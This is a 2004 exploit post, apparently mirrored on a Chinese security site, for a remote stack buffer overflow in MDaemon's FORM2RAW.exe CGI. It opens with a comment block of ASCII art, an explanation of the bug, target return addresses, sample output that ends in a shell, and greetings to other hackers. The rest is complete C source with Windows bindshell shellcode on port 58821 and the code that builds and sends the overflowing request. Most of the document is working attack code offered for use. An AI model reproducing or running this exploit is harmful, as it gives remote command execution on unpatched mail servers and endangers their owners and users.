Remote Buffer Overflow in MDaemon

		当前位置：主页>安全文章>文章资料>Exploits>文章内容

Remote Buffer Overflow in MDaemon

来源：www.rosiello.org 作者：rave 发布时间：2004-03-18

Remote Buffer Overflow in MDaemon (Exploit)

/*
Copyright ? Rosiello Security
http://www.rosiello.org
================

<rave> ____________
<rave> _.-----------------------/ `-,,
<rave> ,' ; ; / `-._
<rave> ; ; ; .') \ `\
<rave> `--------------------.'.' _.-'`- . `\
<rave> ;`---'-------.\, `\ _
<rave> ;, ; .---`, ` -
<rave> ;` ; `.____;
<rave> `--------------'_ ,,
<rave> ,; ; .---`, ` ._
<rave> ;; ; `.____; ___``````
<rave> `;--------------' `
<rave> ,; ; .---`,
<rave> ;; ; `.____;
<rave> `.------------'
<rave> ``----...__ _..=
<rave> `````---=-.---``'`
_
| |_
|_ _|
|_|

/\ \ We /\ \ are /\ \
/::\ \ Black /::\ \ H@t \:\ \
/:/\:\ \ /:/\:\ \ \:\ \
_::\~\:\ \ _::\~\:\ \ /::\ \
/\ \:\ \:\__\ /\ \:\ \:\__\ /:/\:\__\
\:\ \:\ \/__/ \:\ \:\ \/__/ /:/ \/__/
\:\ \:\__\ \:\ \:\__\ /:/ /
\:\/:/ / \:\/:/ / /:/ /
\::/ / \::/ / /:/ /
\/__/ \/__/ \/__/ airsupply@0x557.org
http://www.0x557.org
================

--== Remote Exploit for Mdaemon version v6.85 and prior to 6.52 ==--
Code by: rave
Contact: rave@rosiello.org
Contact: airsupply@0x557.org
Date: March 2004

Bug found by: hat-squad security ( great job !! )

MDaemon offers a full range of mail server functionality. MDaemon protects your users from
spam and viruses, provides full security, includes seamless web access to your email via
WorldClient, remote administration, and much more!".FORM2RAW.exe is a CGI that allows users
to send emails using the MDaemon via a web page. It processes the fields of an HTML form and
creates a raw message file in the raw queue directory of MDaemon mail server. This file then
will be processed and queued for delivery by MDaemon. An attacker can cause a buffer overflow
in MDaemon by issuing a malformed CGI request to FORM2RAW.exe.

According to the Help file "By default, MDaemon 6.52 or higher will not send emails created by
Form2Raw unless the email address passed in the 'from' tag (see below) is a valid account on the
MDaemon server. If you want to disable this behavior you can set the FromCheck=No in FORM2RAW.INI
file".

Sending more than 153 bytes in the "From" field to FROM2Raw.exe creates a raw file that when processed
by MDaemon will cause a Stack buffer overflow. The EIP register will be overwritten when the From field
length is 249 bytes

Do i need to say more ? this is 0wnage 0ldsch00l style have fun..
This spawns a waiting bindshell on the victims computer at port 58821..

ps:
The exploit has only been tested on Windows XP Home and pro edition (dutch) sp1 + the stack
has been proofen to be verry humpy. So please dont yell it me if the exploit doesn't work on your
Operative System .. thanks

The demo mode of the exploit shows in the debugger the following
EAX = 00000000 EBX = 00000000 ECX = 014D1BD8 EDX = 01090000 ESI = 014C6000 EDI = 01AEF1A8
EIP = 42424242 ESP = 01AEEEE8 EBP = 0005E668

Note:Demo mode works on all operative systems

Usage <C:\Mdeamon>Mdeamon_exp.exe <target host> <target number>
Target Number Target Name Stack Adress
============= =========== ===========
0 Demo 0x42424242
1 Windows XP HOME [NL] 0x014D4DFC
2 Windows XP PRO [NL] 0x014D4DFC

<C:\Mdeamon> Mdeamon_exp localhost 1
[+] Winsock Inalized
[+] Trying to connect to localhost:3000
[+] socket inalized
[+] Overflowing string is Prepared
[+] Connected
[+] Overflowing string had been send

<C:\> telnet localhost 58821
Microsoft Windows XP [versie 5.1.2600]
C) Copyright 1985-2001 Microsoft Corp.

D:\MDaemon\APP>

Special Thanks to:
airsuppy { 0x557 security r0cked me, ty for u part and cooperationg bro }
Silicon { Unofficial source`s told me ur a rosiello member good i lent ur bindcode TY 100% }
Sam { once again 0x557 ty for the chat aldo it was a short one }
Dragnet { Always willing to help me out }
Angelo { Verry verry good friend }
Punix { Last time i forgot you girl ! :( im so sorry }

Greetz go out to:
NrAziz { This is my brother anyone who touches him touches me, so pls make my day ! }
sloth { good guy }
Mercy { Hope to see u soon }
Netric security { www.netric.org/.be }
0x557 security (SST) { www.0x557.org }
[+] All the hax0rs i forgot.

This was rosiello there first coorperation with the 0x557 ppl witch have been proofen to be
realy nice, in the past rosiello has worked with (now death) DSR also known as dtors
security research, but (and its a personal wish) hope that 0x557 still will be so nice for
us. I feel my self called to give a great big shoutout to these ppl for there work for now and
in the futhure !! keep on doing the great job !.

Bad sounds of these days {
i cant remember anything , can`t tell of this is trough or a dream. deep down down inside me i ,
feel the stream this terrable silence stop with me. Now that the warn is trough with me im waking
up i can not see that there is nothing left of me nothing is real but pain now.

}

The original advisory can be found at: http://hat-squad.com/bugreport/mdaemon-raw.txt
The mirored advisory can be fount at: http://www.securiteam.com/windowsntfocus/5ZP050ABPY.htm
Our own Advisory can be found at : http://www.rosiello.org/en/read_bugs.php?17

!!!DO NOT USE THIS CODE ON DIFFERENT MACHINES BUT YOURS!!!
Respect the law as we do!

I'm outa here bye bye !
*/

#include <stdio.h>
#include <winsock2.h>
#include <errno.h>
#include <windows.h>

// Darn fucking 1337 macro shit
#define ISIP(m) (!(inet_addr(m) ==-1))

#define offset 267 //;267 //1024

// hmm :D
#define NOPS "\x90\x90\x90\x90\x90\x90\x90"

struct sh_fix
{
unsigned long _wsasock;
unsigned long _bind;
unsigned long _listen;
unsigned long _accept;
unsigned long _stdhandle;
unsigned long _system;
} ;

struct remote_targets {
char *os;
unsigned long sh_addr;
struct sh_fix _sh_fix;
} target [] ={
/* Option`s for your eyes only :D*/
"Demo ",
0x42424242,
{ 0x90909090,
0x90909090,
0x90909090,
0x90909090,
0x90909090,// <--
0x90909090,
},

"Windows XP HOME [NL]",
0x014D4DFC,
{ 0x71a35a01,
0x71a33ece,
0x71a35de2,
0x71a3868d,
0x77e6191d,// <--
0x77bf8044,
},

"Windows XP PRO [NL]",
0x014D4DFC,
{ 0x71a35a01,
0x71a33ece,
0x71a35de2,
0x71a3868d,
0x77e6191d,// <--
0x77bf8044,
}
};

unsigned char _addy [] =
"\x90\x90\x90\x90";

// 116 bytes bindcode for windows,(NTlike) port=58821, by silicon :)
// w000w you rule !!
unsigned char shellcode[] =

"\x83\xC4\xEC\x33\xC0\x50\x50\x50\x6A\x06"
"\x6A\x01\x6A\x02\xB8"
"\xAA\xAA\xAA\xAA"
"\xFF\xD0\x8B\xD8\x33\xC0\x89\x45\xF4\xB0"
"\x02\x66\x89\x45\xF0\x66\xC7\x45\xF2\xE5"
"\xC5\x6A\x10\x8D\x55\xF0\x52\x53\xB8"
"\xBB\xBB\xBB\xBB"
"\xFF\xD0\x6A\x01\x53\xB8"
"\xCC\xCC\xCC\xCC"
"\xFF\xD0\x33\xC0\x50\x50\x53\xB8"
"\xDD\xDD\xDD\xDD"
"\xFF\xD0\x8B\xD8\xBA"
"\xEE\xEE\xEE\xEE"
"\x53\x6A\xF6\xFF\xD2\x53\x6A\xF5\xFF\xD2"
"\x53\x6A\xF4\xFF\xD2\xC7\x45\xFB\x41\x63"
"\x6D\x64\x8D\x45\xFC\x50\xB8"
"\xFF\xFF\xFF\xFF"
"\xFF\xD0\x41";

/* The funny thing is while exploiting this bug one of the adresses
(see target[1 || 2].sh_addr) had a forbidden character (0x20 aka space) to fix this i wrote
this addy/mini shellcode tho replace the 0x19 (thats not supposed to be there) in the
SetStdHandle () adress inside the shellcode for an 0x20.
*/

unsigned char _me [] =
"\x33\xC9" // xor ecx,ecx
"\xBE\xAA\xAA\xAA\xAA" // mov esi,offset _shellcode (00421a50)
"\x83\xC1\x1F" // add ecx,1Fh
"\x41" // inc ecx
"\x66\x89\x4E\x50" // mov word ptr [esi+50h],cx
"\xC6\x46\x51\xE6"; // mov byte ptr [esi+51h],0E6h

// now what would this button do ?
char *host_ip;
u_long get_ip(char *hostname)
{
struct hostent *hp;

if (ISIP(hostname)) return inet_addr(hostname);

if ((hp = gethostbyname(hostname))==NULL)
{ perror ("[+] gethostbyname() failed check the existance of the host.\n");
exit(-1); }

return (inet_ntoa(*((struct in_addr *)hp->h_addr)));
}

int fix_shellcode ( int choise )
{
unsigned long only_xp =target[choise].sh_addr+strlen(NOPS)+strlen(_me);

memcpy(_me+3,((char *)&only_xp),4);

//0xf offset to the adres of WSASocketA
memcpy(shellcode+0xf,((char *)&target[choise]._sh_fix._wsasock),4);

//0x30 offset to the adres of bind
memcpy(shellcode+0x30,((char *)&target[choise]._sh_fix._bind),4);

//0x3a offset to the adres of listen
memcpy(shellcode+0x3a,((char *)&target[choise]._sh_fix._listen),4);

//0x46 offset to the adres of _accept
memcpy(shellcode+0x46,((char *)&target[choise]._sh_fix._accept),4);

//0x4f offset to the adres of SetStdHandle
memcpy(shellcode+0x4f,((char *)&target[choise]._sh_fix._stdhandle),4);

//0x6e offset to the adres of SYSTEM
memcpy(shellcode+0x6e,((char *)&target[choise]._sh_fix._system),4);

return 0;

}
/// oooh yeah uuuh right .... Crap dont you uuh yeah at me you know me !
int usage (char *what)
{
int i;

fprintf(stdout,"Copyright ? Rosiello Security\n");
fprintf(stdout,"http://www.rosiello.org\n\n");
fprintf(stdout,"Usage %s <target host> <target number>\n",what);
fprintf(stdout,"Target Number\t\tTarget Name\t\t\t\tStack Adress\n");
fprintf(stdout,"=============\t\t===========\t\t\t\t===========\n");

for (i=0;i < 3;i++)
fprintf(stdout,"%d\t\t\t%s\t\t0x%p\n",i,target[i].os,target[i].sh_addr);

exit(0);
}

int main(int argc,char **argv)
{
char buffer[offset*4]="get /form2raw.cgi?From=",*ptr,*address;
int sd,oops,i,choise;
struct sockaddr_in ooh;

WSADATA wsadata;
WSAStartup(0x101, &wsadata);

if (argc < 2) usage(argv[0]);
address=argv[1];
choise=atoi(argv[2]);
fix_shellcode(choise);

fprintf(stdout,"[+] Winsock Inalized\n");

/* Lets start making a litle setup
Change the port if you have to */

ooh.sin_addr.s_addr = inet_addr(get_ip(address));
ooh.sin_port = htons(3000);
ooh.sin_family = AF_INET;

fprintf(stdout,"[+] Trying to connect to %s:%d\n",address,3000);

// ok ok here`s ur sock()
sd = socket(AF_INET, SOCK_STREAM,IPPROTO_TCP);
if (!sd<0) { fprintf(stderr,"[!] socket() failed.\n");exit (-1); }

fprintf(stdout,"[+] socket inalized\n");

/* inalizing the expploiting buffer read the file comments for the details */
ptr=buffer+strlen(buffer);

for (i=strlen(buffer);i < offset;i++) *ptr++=(char)0x40;

sprintf(buffer+strlen(buffer),"%s%s&To=airsupply@0x557.org&Subject=hi&Body=%s%s%s HTTP/1.0\r\n\r\n",
((char *)&target[choise].sh_addr),_addy,NOPS,_me,shellcode);

//memcpy(buffer+35,shellcode,strlen(shellcode));

fprintf(stdout,"[+] Overflowing string is Prepared\n");

// Knock knock ... hi i want to hook up with you
oops=connect(sd, (struct sockaddr *)&ooh, sizeof( ooh ));
if(oops!=0) { fprintf(stderr,"[!] connect() failed.\n"); exit(-1); }

// yep wher`e in :D
fprintf(stdout,"[+] Connected\n");

// Sending some Dangerous stuff
i = send(sd,buffer,strlen(buffer),0);
if (!i <0) { fprintf (stdout,"[!] Send() failed\n"); exit (-1) ; }

fprintf(stdout,"[+] Overflowing string had been send\n");

// Bring in the cleaners !!
WSACleanup();

// [EOF]
return 0;

}

[